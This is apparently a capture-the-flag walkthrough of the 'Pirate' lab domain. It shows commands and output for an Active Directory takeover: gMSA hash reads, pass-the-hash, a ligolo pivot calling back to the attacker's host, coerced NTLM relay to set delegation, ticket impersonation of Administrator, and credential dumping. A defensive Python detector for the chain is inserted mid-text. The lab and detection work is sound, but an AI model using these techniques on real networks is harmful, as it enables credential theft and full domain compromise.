Initial Creds
As is common in real-life pentests, you will start the Pirate box with credentials for the following account:
pentest
p3nt3st2025!&
Enum
- Basic scans and setup
$ export IP=10.129.7.107
$ rustscan --ulimit 10000 -a $IP -- -sCTV -Pn
Open 10.129.7.107:53
Open 10.129.7.107:80
Open 10.129.7.107:88
Open 10.129.7.107:135
Open 10.129.7.107:139
Open 10.129.7.107:593
Open 10.129.7.107:636
Open 10.129.7.107:389
Open 10.129.7.107:464
Open 10.129.7.107:445
Open 10.129.7.107:9389
Open 10.129.7.107:49666
Open 10.129.7.107:49678
Open 10.129.7.107:49677
Open 10.129.7.107:49680
Open 10.129.7.107:49681
Open 10.129.7.107:49906
Open 10.129.7.107:51750
Open 10.129.7.107:51775
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack Simple DNS Plus
80/tcp open http syn-ack Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2026-03-01 06:22:42Z)
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: pirate.htb, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.pirate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.pirate.htb
| Issuer: commonName=pirate-DC01-CA/domainComponent=pirate
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-06-09T14:05:15
| Not valid after: 2026-06-09T14:05:15
| MD5: 5c8e b331 ef90 890a d8e3 feaa b53c 2910
| SHA-1: 0128 c655 2aed c190 efff d3eb a2fb 034b fa86 ab69
| SHA-256: a2c7 cecc 4854 8f57 a69c 7302 9621 8bb1 6796 ee2d ad60 c34b b005 9a00 a1e6 3358
| -----BEGIN CERTIFICATE-----
|_-----END CERTIFICATE-----
|_ssl-date: 2026-03-01T06:24:13+00:00; +7h00m01s from scanner time.
445/tcp open microsoft-ds? syn-ack
464/tcp open kpasswd5? syn-ack
593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: pirate.htb, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.pirate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.pirate.htb
| Issuer: commonName=pirate-DC01-CA/domainComponent=pirate
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-06-09T14:05:15
| Not valid after: 2026-06-09T14:05:15
| MD5: 5c8e b331 ef90 890a d8e3 feaa b53c 2910
| SHA-1: 0128 c655 2aed c190 efff d3eb a2fb 034b fa86 ab69
| SHA-256: a2c7 cecc 4854 8f57 a69c 7302 9621 8bb1 6796 ee2d ad60 c34b b005 9a00 a1e6 3358
| -----BEGIN CERTIFICATE-----
|_-----END CERTIFICATE-----
|_ssl-date: 2026-03-01T06:24:12+00:00; +7h00m00s from scanner time.
9389/tcp open mc-nmf syn-ack .NET Message Framing
49666/tcp open msrpc syn-ack Microsoft Windows RPC
49677/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
49678/tcp open msrpc syn-ack Microsoft Windows RPC
49680/tcp open msrpc syn-ack Microsoft Windows RPC
49681/tcp open msrpc syn-ack Microsoft Windows RPC
49906/tcp open msrpc syn-ack Microsoft Windows RPC
51750/tcp open msrpc syn-ack Microsoft Windows RPC
51775/tcp open msrpc syn-ack Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 47698/tcp): CLEAN (Timeout)
| Check 2 (port 24309/tcp): CLEAN (Timeout)
| Check 3 (port 58054/udp): CLEAN (Timeout)
| Check 4 (port 53986/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-time:
| date: 2026-03-01T06:23:32
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
|_clock-skew: mean: 7h00m00s, deviation: 0s, median: 6h59m59s
- Fix time skew
- Update /etc/hosts
$ sudo ntpdate $IP
$ echo "$IP pirate.htb dc01.pirate.htb dc01 DC01" | sudo tee -a /etc/hosts
- Testing our initial credentials, we find we can enumerate smb and ldap
- We find some interesting information searching for gMSA accounts and weak security settings; nxc is pretty handy here for its modules
$ nxc smb $IP -u 'pentest' -p'p3nt3st2025!&'
SMB 10.129.7.107 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:pirate.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.7.107 445 DC01 [+] pirate.htb\pentest:p3nt3st2025!&
$ nxc smb $IP -u 'pentest' -p'p3nt3st2025!&' --rid-brute
SMB 10.129.7.107 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:pirate.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.7.107 445 DC01 [+] pirate.htb\pentest:p3nt3st2025!&
SMB 10.129.7.107 445 DC01 498: PIRATE\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.129.7.107 445 DC01 500: PIRATE\Administrator (SidTypeUser)
SMB 10.129.7.107 445 DC01 501: PIRATE\Guest (SidTypeUser)
SMB 10.129.7.107 445 DC01 502: PIRATE\krbtgt (SidTypeUser)
SMB 10.129.7.107 445 DC01 512: PIRATE\Domain Admins (SidTypeGroup)
SMB 10.129.7.107 445 DC01 513: PIRATE\Domain Users (SidTypeGroup)
SMB 10.129.7.107 445 DC01 514: PIRATE\Domain Guests (SidTypeGroup)
SMB 10.129.7.107 445 DC01 515: PIRATE\Domain Computers (SidTypeGroup)
SMB 10.129.7.107 445 DC01 516: PIRATE\Domain Controllers (SidTypeGroup)
SMB 10.129.7.107 445 DC01 517: PIRATE\Cert Publishers (SidTypeAlias)
SMB 10.129.7.107 445 DC01 518: PIRATE\Schema Admins (SidTypeGroup)
SMB 10.129.7.107 445 DC01 519: PIRATE\Enterprise Admins (SidTypeGroup)
SMB 10.129.7.107 445 DC01 520: PIRATE\Group Policy Creator Owners (SidTypeGroup)
SMB 10.129.7.107 445 DC01 521: PIRATE\Read-only Domain Controllers (SidTypeGroup)
SMB 10.129.7.107 445 DC01 522: PIRATE\Cloneable Domain Controllers (SidTypeGroup)
SMB 10.129.7.107 445 DC01 525: PIRATE\Protected Users (SidTypeGroup)
SMB 10.129.7.107 445 DC01 526: PIRATE\Key Admins (SidTypeGroup)
SMB 10.129.7.107 445 DC01 527: PIRATE\Enterprise Key Admins (SidTypeGroup)
SMB 10.129.7.107 445 DC01 553: PIRATE\RAS and IAS Servers (SidTypeAlias)
SMB 10.129.7.107 445 DC01 571: PIRATE\Allowed RODC Password Replication Group (SidTypeAlias)
SMB 10.129.7.107 445 DC01 572: PIRATE\Denied RODC Password Replication Group (SidTypeAlias)
SMB 10.129.7.107 445 DC01 1000: PIRATE\DC01$ (SidTypeUser)
SMB 10.129.7.107 445 DC01 1101: PIRATE\DnsAdmins (SidTypeAlias)
SMB 10.129.7.107 445 DC01 1102: PIRATE\DnsUpdateProxy (SidTypeGroup)
SMB 10.129.7.107 445 DC01 1103: PIRATE\IT (SidTypeGroup)
SMB 10.129.7.107 445 DC01 1104: PIRATE\a.white_adm (SidTypeUser)
SMB 10.129.7.107 445 DC01 3101: PIRATE\a.white (SidTypeUser)
SMB 10.129.7.107 445 DC01 3102: PIRATE\WEB01$ (SidTypeUser)
$ nxc ldap $IP -u 'pentest' -p'p3nt3st2025!&'
LDAP 10.129.7.107 389 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:pirate.htb) (signing:None) (channel binding:Never)
LDAP 10.129.7.107 389 DC01 [+] pirate.htb\pentest:p3nt3st2025!&
$ nxc ldap 10.129.7.107 -u pentest -p 'p3nt3st2025!&' --find-delegation
LDAP 10.129.7.107 389 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:pirate.htb) (signing:None) (channel binding:Never)
LDAP 10.129.7.107 389 DC01 [+] pirate.htb\pentest:p3nt3st2025!&
LDAP 10.129.7.107 389 DC01 AccountName AccountType DelegationType DelegationRightsTo
LDAP 10.129.7.107 389 DC01 ----------- ----------- ---------------------------------- ---------------------------------------
LDAP 10.129.7.107 389 DC01 a.white_adm Person Constrained w/ Protocol Transition http/WEB01.pirate.htb, HTTP/WEB01
$ nxc ldap $IP -u 'pentest' -p'p3nt3st2025!&' --gmsa
LDAP 10.129.7.107 389 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:pirate.htb) (signing:None) (channel binding:Never)
LDAP 10.129.7.107 389 DC01 [+] pirate.htb\pentest:p3nt3st2025!&
LDAP 10.129.7.107 389 DC01 [*] Getting GMSA Passwords
LDAP 10.129.7.107 389 DC01 Account: gMSA_ADCS_prod$ NTLM: <no read permissions> PrincipalsAllowedToReadPassword: Domain Secure Servers
LDAP 10.129.7.107 389 DC01 Account: gMSA_ADFS_prod$ NTLM: <no read permissions> PrincipalsAllowedToReadPassword: Domain Secure Servers
$ nxc ldap $IP -u 'pentest' -p'p3nt3st2025!&' --password-not-required
LDAP 10.129.7.107 389 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:pirate.htb) (signing:None) (channel binding:Never)
LDAP 10.129.7.107 389 DC01 [+] pirate.htb\pentest:p3nt3st2025!&
LDAP 10.129.7.107 389 DC01 User: MS01$ Status: enabled
LDAP 10.129.7.107 389 DC01 User: EXCH01$ Status: enabled
LDAP 10.129.7.107 389 DC01 User: Guest Status: disabled
- We see another machine, WEB01; user a.white_adm has delegation rights; gMSA_ADCS_prod$ & gMSA_ADFS_prod$ may have readable GMSA passwords with other credentials; MS01$ does not require a password and may have the privileges we need
- Can grab a ticket to then attempt reading GMSA again
$ getTGT.py 'pirate.htb/MS01$:ms01' -dc-ip $IP
Impacket v0.14.0.dev0+20251117.163331.7bd0d5ab - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in MS01$.ccache
$ export KRB5CCNAME=MS01$.ccache
$ klist
Ticket cache: FILE:MS01$.ccache
Default principal: MS01$@PIRATE.HTB
- Now try GMSA again, using the --use-kcache flag for authentication this time
$ nxc ldap $IP --use-kcache --gmsa
LDAP 10.129.7.107 389 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:PIRATE.HTB) (signing:None) (channel binding:Never)
LDAP 10.129.7.107 389 DC01 [+] PIRATE.HTB\MS01$ from ccache
LDAP 10.129.7.107 389 DC01 [*] Getting GMSA Passwords
LDAP 10.129.7.107 389 DC01 Account: gMSA_ADCS_prod$ NTLM: 304106f739822ea2ad8ebe23f802d078 PrincipalsAllowedToReadPassword: Domain Secure Servers
LDAP 10.129.7.107 389 DC01 Account: gMSA_ADFS_prod$ NTLM: 8126756fb2e69697bfcb04816e685839 PrincipalsAllowedToReadPassword: Domain Secure Servers
$ nxc winrm $IP -u 'gMSA_ADCS_prod$' -H 304106f739822ea2ad8ebe23f802d078
WINRM 10.129.7.107 5985 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:pirate.htb)
WINRM 10.129.7.107 5985 DC01 [+] pirate.htb\gMSA_ADCS_prod$:304106f739822ea2ad8ebe23f802d078 (Pwn3d!)
$ nxc winrm $IP -u 'gMSA_ADFS_prod$' -H 8126756fb2e69697bfcb04816e685839
WINRM 10.129.7.107 5985 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:pirate.htb)
WINRM 10.129.7.107 5985 DC01 [+] pirate.htb\gMSA_ADFS_prod$:8126756fb2e69697bfcb04816e685839 (Pwn3d!)
- We can use either of these hashes to remote into DC01
$ evil-winrm -i $IP -u 'gMSA_ADCS_prod$' -H 304106f739822ea2ad8ebe23f802d078
*Evil-WinRM* PS C:\Users\gMSA_ADCS_prod$\Documents>
$ evil-winrm -i dc01.pirate.htb -u 'gMSA_ADFS_prod$' -H 8126756fb2e69697bfcb04816e685839
*Evil-WinRM* PS C:\Users\gMSA_ADFS_prod$\Documents>
- Since we saw something about the WEB01 machine earlier, we should check our network config
*Evil-WinRM* PS C:\Users\gMSA_ADFS_prod$\Documents> nslookup dc01
Server: localhost
Address: 127.0.0.1
Name: dc01.pirate.htb
Addresses: 192.168.100.1
10.129.7.107
*Evil-WinRM* PS C:\Users\gMSA_ADFS_prod$\Documents> nslookup web01
Server: localhost
Address: 127.0.0.1
Name: WEB01.pirate.htb
Address: 192.168.100.2
Internals
DC01  192.168.100.1
WEB01 192.168.100.2
- We will need to pivot in order to access the 192.168.100.0/24 network
- Ligolo is pretty great for this
*Evil-WinRM* PS C:\Users\gMSA_ADFS_prod$\Documents> upload agent.exe
*Evil-WinRM* PS C:\Users\gMSA_ADFS_prod$\Documents> .\agent.exe -connect YOUR_IP:PORT -ignore-cert -retry
- On your machine
$ sudo ./proxy -selfcert -laddr 0.0.0.0:PORT
ligolo-ng » session
? Specify a session : 1 - PIRATE\gMSA_ADFS_prod$@DC01 - 10.129.7.107:64365 - 00155d0bd000
[Agent : PIRATE\gMSA_ADFS_prod$@DC01] » ifcreate --name ligolo
[Agent : PIRATE\gMSA_ADFS_prod$@DC01] » route_add --name ligolo --route 240.0.0.0/4
[Agent : PIRATE\gMSA_ADFS_prod$@DC01] » route_add --name ligolo --route 192.168.100.0/24
[Agent : PIRATE\gMSA_ADFS_prod$@DC01] » start --tun ligolo
- We can update /etc/hosts with this IP for WEB01
$ echo "192.168.100.2 web01.pirate.htb web01 WEB01" | sudo tee -a /etc/hosts
- Testing the hashes again against web01, we can also remote in with gMSA_ADFS_prod$
$ nxc winrm web01 -u 'gMSA_ADCS_prod$' -H 304106f739822ea2ad8ebe23f802d078
WINRM 192.168.100.2 5985 WEB01 [*] Windows 10 / Server 2019 Build 17763 (name:WEB01) (domain:pirate.htb)
WINRM 192.168.100.2 5985 WEB01 [-] pirate.htb\gMSA_ADCS_prod$:304106f739822ea2ad8ebe23f802d078
$ nxc winrm web01 -u 'gMSA_ADFS_prod$' -H 8126756fb2e69697bfcb04816e685839
WINRM 192.168.100.2 5985 WEB01 [*] Windows 10 / Server 2019 Build 17763 (name:WEB01) (domain:pirate.htb)
WINRM 192.168.100.2 5985 WEB01 [+] pirate.htb\gMSA_ADFS_prod$:8126756fb2e69697bfcb04816e685839 (Pwn3d!)
- Connect and we can verify we are on WEB01
$ evil-winrm -i web01.pirate.htb -u 'gMSA_ADFS_prod$' -H 8126756fb2e69697bfcb04816e685839
*Evil-WinRM* PS C:\Users\gMSA_ADFS_prod$.PIRATE\Documents> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet 2:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.100.2
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.100.1
User
- WinPEAS reveals some AutoLogon information
*Evil-WinRM* PS C:\Users\gMSA_ADFS_prod$.PIRATE\Documents> upload winPEASany.exe
*Evil-WinRM* PS C:\Users\gMSA_ADFS_prod$.PIRATE\Documents> ./winPEASany.exe
*snip*
╔══════════╣ Looking for AutoLogon credentials
Some AutoLogon credentials were found
DefaultDomainName : PIRATE
DefaultUserName : a.white
- We can enumerate a little further by checking the registry
*Evil-WinRM* PS C:\Users\gMSA_ADFS_prod$.PIRATE\Documents> reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon
AutoRestartShell REG_DWORD 0x1
Background REG_SZ 0 0 0
CachedLogonsCount REG_SZ 10
DebugServerCommand REG_SZ no
DefaultDomainName REG_SZ PIRATE
DefaultUserName REG_SZ a.white
DisableBackButton REG_DWORD 0x1
EnableSIHostIntegration REG_DWORD 0x1
ForceUnlockLogon REG_DWORD 0x0
LegalNoticeCaption REG_SZ
LegalNoticeText REG_SZ
PasswordExpiryWarning REG_DWORD 0x5
PowerdownAfterShutdown REG_SZ 0
PreCreateKnownFolders REG_SZ {A520A1A4-1780-4FF6-BD18-167343C5AF16}
ReportBootOk REG_SZ 1
Shell REG_SZ explorer.exe
ShellCritical REG_DWORD 0x0
ShellInfrastructure REG_SZ sihost.exe
SiHostCritical REG_DWORD 0x0
SiHostReadyTimeOut REG_DWORD 0x0
SiHostRestartCountLimit REG_DWORD 0x0
SiHostRestartTimeGap REG_DWORD 0x0
Userinit REG_SZ C:\Windows\system32\userinit.exe,
VMApplet REG_SZ SystemPropertiesPerformance.exe /pagefile
WinStationsDisabled REG_SZ 0
ShellAppRuntime REG_SZ ShellAppRuntime.exe
scremoveoption REG_SZ 0
DisableCAD REG_DWORD 0x1
LastLogOffEndTimePerfCounter REG_QWORD 0xdf8ec1d0
ShutdownFlags REG_DWORD 0x13
AutoAdminLogon REG_SZ 1
AutoLogonSID REG_SZ S-1-5-21-4107424128-4158083573-1300325248-3101
LastUsedUsername REG_SZ a.white
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\AlternateShells
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\GPExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\UserDefaults
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\AutoLogonChecked
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\VolatileUserMgrKey
- Seems likely that a.white is logging in automatically; maybe we need to coerce authentication and see if we can capture anything interesting
- We can try the coerce_plus module in nxc to test potential capture vectors after setting up our ntlmrelayx listener
$ sudo ntlmrelayx.py -t ldaps://$IP --delegate-access --remove-mic -smb2support
- Trigger coercion (update your IP)
$ nxc smb web01 -u 'gMSA_ADFS_prod$' -H 8126756fb2e69697bfcb04816e685839 -M coerce_plus -o LISTENER=<YOUR_IP>
SMB 192.168.100.2 445 WEB01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:WEB01) (domain:pirate.htb) (signing:False) (SMBv1:None)
SMB 192.168.100.2 445 WEB01 [+] pirate.htb\gMSA_ADFS_prod$:8126756fb2e69697bfcb04816e685839
COERCE_PLUS 192.168.100.2 445 WEB01 VULNERABLE, PetitPotam
COERCE_PLUS 192.168.100.2 445 WEB01 Exploit Success, efsrpc\EfsRpcAddUsersToFile
COERCE_PLUS 192.168.100.2 445 WEB01 VULNERABLE, PrinterBug
COERCE_PLUS 192.168.100.2 445 WEB01 VULNERABLE, PrinterBug
- We observe successful exploitation in the listener, with a randomly named computer account being created
*snip*
[*] Servers started, waiting for connections
[*] (SMB): Received connection from 10.129.7.107, attacking target ldaps://10.129.7.107
[*] (SMB): Authenticating connection from PIRATE/WEB01$@10.129.7.107 against ldaps://10.129.7.107 SUCCEED [1]
[*] ldaps://PIRATE/WEB01$@10.129.7.107 [1] -> Enumerating relayed user`s privileges. This may take a while on large domains
[*] All targets processed!
[*] (SMB): Connection from 10.129.7.107 controlled, but there are no more targets left!
[*] ldaps://PIRATE/WEB01$@10.129.7.107 [1] -> Attempting to create computer in: CN=Computers,DC=pirate,DC=htb
[*] ldaps://PIRATE/WEB01$@10.129.7.107 [1] -> Adding new computer with username: MHNBCAIC$ and password: M1r{h_ip^lC7<bk result: OK
[*] ldaps://PIRATE/WEB01$@10.129.7.107 [1] -> Delegation rights modified succesfully!
[*] ldaps://PIRATE/WEB01$@10.129.7.107 [1] -> MHNBCAIC$ can now impersonate users on WEB01$ via S4U2Proxy
[*] All targets processed!
- We can now try to impersonate Administrator on WEB01 with this user
- Using HTTP in the SPN so we can winrm
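The sequence in the listener output above (a machine account creating a new computer account over relayed LDAPS, an RBCD write on WEB01$ by WEB01$ itself, then an S4U2Proxy ticket for Administrator) is exactly what a defender should be alerting on. The following is an added example, not part of the original writeup: a small Python detector run over constructed Security-log events modelled on that chain. The event IDs (4741, 5136, 4769) are real, but the field names are assumed to follow the Windows Security event XML schema and the records themselves are made up.

```python
"""Detect the coerce -> relay -> RBCD -> S4U2Proxy chain from Security-log events.

Added example, not from the original writeup. SAMPLE_EVENTS is constructed to
mirror what DC01's Security log would contain; field names are assumed to
follow the Windows Security event schema (verify against your SIEM mapping).
"""
from dataclasses import dataclass

RBCD_ATTR = "msDS-AllowedToActOnBehalfOfOtherIdentity"


@dataclass
class Finding:
    severity: str
    event_id: int
    subject: str
    reason: str


def is_machine_account(name: str) -> bool:
    """Computer accounts end with '$' (WEB01$, MHNBCAIC$)."""
    return name.endswith("$")


def dn_to_account(dn: str) -> str:
    """'CN=WEB01,CN=Computers,DC=pirate,DC=htb' -> 'WEB01$'."""
    return dn.split(",", 1)[0].split("=", 1)[1] + "$"


def detect_relay_rbcd(events):
    findings = []
    suspicious_new_accounts = set()  # computer accounts created by other computer accounts
    for ev in events:
        eid, subj = ev["EventID"], ev.get("SubjectUserName", "")
        if eid == 4741 and is_machine_account(subj):
            # 4741 = computer account created. A machine account as the subject is the
            # signature of relayed machine authentication (WEB01$ created MHNBCAIC$).
            new = ev["TargetUserName"]
            suspicious_new_accounts.add(new)
            findings.append(Finding("medium", eid, subj, f"{subj} created computer account {new}"))
        elif eid == 5136 and ev.get("AttributeLDAPDisplayName") == RBCD_ATTR:
            # 5136 = directory object modified (needs 'Audit Directory Service Changes').
            # A computer writing RBCD on its own object is the --delegate-access outcome.
            target = dn_to_account(ev["ObjectDN"])
            self_write = target.upper() == subj.upper()
            sev = "high" if self_write else "medium"
            findings.append(Finding(sev, eid, subj, f"RBCD set on {target}" + (" by itself" if self_write else "")))
        elif eid == 4769 and ev.get("TransitedServices", "-") != "-":
            # 4769 = service ticket requested. TransitedServices is populated only for
            # S4U2Proxy: it names the delegating account, TargetUserName the impersonated user.
            delegator = ev["TransitedServices"].split("@", 1)[0]
            sev = "high" if delegator in suspicious_new_accounts else "medium"
            findings.append(Finding(sev, eid, delegator,
                                    f"S4U2Proxy: {delegator} obtained {ev['ServiceName']} ticket as {ev['TargetUserName']}"))
    return findings


# Constructed events (not a real log capture), in the order the chain produces them.
SAMPLE_EVENTS = [
    {"EventID": 4741, "SubjectUserName": "a.white_adm", "TargetUserName": "BUILD07$"},  # benign admin join
    {"EventID": 4741, "SubjectUserName": "WEB01$", "TargetUserName": "MHNBCAIC$"},
    {"EventID": 5136, "SubjectUserName": "WEB01$", "ObjectDN": "CN=WEB01,CN=Computers,DC=pirate,DC=htb",
     "AttributeLDAPDisplayName": RBCD_ATTR, "OperationType": "%%14674"},
    {"EventID": 4769, "TargetUserName": "a.white@PIRATE.HTB", "ServiceName": "WEB01$", "TransitedServices": "-"},
    {"EventID": 4769, "TargetUserName": "Administrator@PIRATE.HTB", "ServiceName": "WEB01$",
     "TransitedServices": "MHNBCAIC$@PIRATE.HTB"},
]


if __name__ == "__main__":
    for f in detect_relay_rbcd(SAMPLE_EVENTS):
        print(f"[{f.severity:6}] {f.event_id} {f.subject}: {f.reason}")
```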
$ getST.py -dc-ip $IP -spn HTTP/web01.pirate.htb -impersonate Administrator 'PIRATE.HTB/MHNBCAIC$:M1r{h_ip^lC7<bk'
Impacket v0.14.0.dev0+20251117.163331.7bd0d5ab - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@HTTP_web01.pirate.htb@PIRATE.HTB.ccache
$ export KRB5CCNAME=Administrator@HTTP_web01.pirate.htb@PIRATE.HTB.ccache
- Connect via evil-winrm and grab the user flag
$ evil-winrm -i web01.pirate.htb -r PIRATE.HTB -u Administrator
*Evil-WinRM* PS C:\Users\Administrator.PIRATE\Documents> whoami
pirate\administrator
*Evil-WinRM* PS C:\Users\Administrator.PIRATE\Documents> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet 2:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.100.2
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.100.1
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ../../a.white/Desktop/user.txt
Root
- A secretsdump of WEB01 reveals logon credentials for a.white that we can test
$ secretsdump.py -k -no-pass -target-ip 192.168.100.2 PIRATE.HTB/Administrator@web01.pirate.htb
Impacket v0.14.0.dev0+20251117.163331.7bd0d5ab - Copyright Fortra, LLC and its affiliated companies
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x342dfe90cc4061078b79f011cd08f931
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:b1aac1584c2ea8ed0a9429684e4fc3e5:::
[*] DefaultPassword
PIRATE\a.white:E2nvAOKSz5Xz2MJu
$ nxc smb $IP -u 'a.white' -p 'E2nvAOKSz5Xz2MJu'
SMB 10.129.7.107 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:pirate.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.7.107 445 DC01 [+] pirate.htb\a.white:E2nvAOKSz5Xz2MJu
$ nxc ldap $IP -u 'a.white' -p 'E2nvAOKSz5Xz2MJu'
LDAP 10.129.7.107 389 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:pirate.htb) (signing:None) (channel binding:Never)
LDAP 10.129.7.107 389 DC01 [+] pirate.htb\a.white:E2nvAOKSz5Xz2MJu
$ nxc winrm $IP -u 'a.white' -p 'E2nvAOKSz5Xz2MJu'
WINRM 10.129.7.107 5985 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:pirate.htb)
WINRM 10.129.7.107 5985 DC01 [-] pirate.htb\a.white:E2nvAOKSz5Xz2MJu
- Enumerating the account, we find we can edit a.white_adm
$ bloodyAD --host $IP -u a.white -p 'E2nvAOKSz5Xz2MJu' get writable
distinguishedName: CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=pirate,DC=htb
permission: WRITE
distinguishedName: CN=Angela W. ADM,CN=Users,DC=pirate,DC=htb
permission: WRITE
distinguishedName: CN=Angela White,CN=Users,DC=pirate,DC=htb
permission: WRITE
- Reset the password so we can rerun the check and enumerate further
$ bloodyAD --host $IP -u a.white -p 'E2nvAOKSz5Xz2MJu' set password a.white_adm 'asdfASDF1234!'
[+] Password changed successfully!
- Check the same thing with these new creds
$ bloodyAD --host $IP -u a.white_adm -p 'asdfASDF1234!' get writable
distinguishedName: CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=pirate,DC=htb
permission: WRITE
distinguishedName: CN=DC01,OU=Domain Controllers,DC=pirate,DC=htb
permission: WRITE
distinguishedName: CN=Angela W. ADM,CN=Users,DC=pirate,DC=htb
permission: WRITE
distinguishedName: CN=WEB01,CN=Computers,DC=pirate,DC=htb
permission: WRITE
distinguishedName: CN=MS01,CN=Computers,DC=pirate,DC=htb
permission: WRITE
distinguishedName: CN=EXCH01,CN=Computers,DC=pirate,DC=htb
permission: WRITE
- We can remove the HTTP/WEB01.pirate.htb SPN from WEB01 and add it to DC01, so the same constrained delegation gives us another impersonation, this time against DC01
$ bloodyAD --host dc01.pirate.htb -d pirate.htb -u a.white_adm -p 'asdfASDF1234!' msldap delspn 'CN=WEB01,CN=Computers,DC=pirate,DC=htb' 'HTTP/WEB01.pirate.htb'
SPN removed!
$ bloodyAD --host dc01.pirate.htb -d pirate.htb -u a.white_adm -p 'asdfASDF1234!' msldap addspn 'CN=DC01,OU=Domain Controllers,DC=pirate,DC=htb' 'HTTP/WEB01.pirate.htb'
SPN added!
- Now we can get another ticket impersonating Administrator and connect via evil-winrm
$ getST.py -dc-ip $IP -spn HTTP/WEB01.pirate.htb -altservice HTTP/DC01.pirate.htb -impersonate Administrator 'pirate.htb/a.white_adm:asdfASDF1234!'
Impacket v0.14.0.dev0+20251117.163331.7bd0d5ab - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Changing service from HTTP/WEB01.pirate.htb@PIRATE.HTB to HTTP/DC01.pirate.htb@PIRATE.HTB
[*] Saving ticket in Administrator@HTTP_DC01.pirate.htb@PIRATE.HTB.ccache
$ export KRB5CCNAME=Administrator@HTTP_DC01.pirate.htb@PIRATE.HTB.ccache
$ nxc ldap $IP --use-kcache
LDAP 10.129.7.107 389 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:pirate.htb) (signing:None) (channel binding:Never)
LDAP 10.129.7.107 389 DC01 [+] pirate.htb\Administrator from ccache (Pwn3d!)
$ nxc smb $IP --use-kcache
SMB 10.129.7.107 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:pirate.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.7.107 445 DC01 [+] pirate.htb\Administrator from ccache (Pwn3d!)
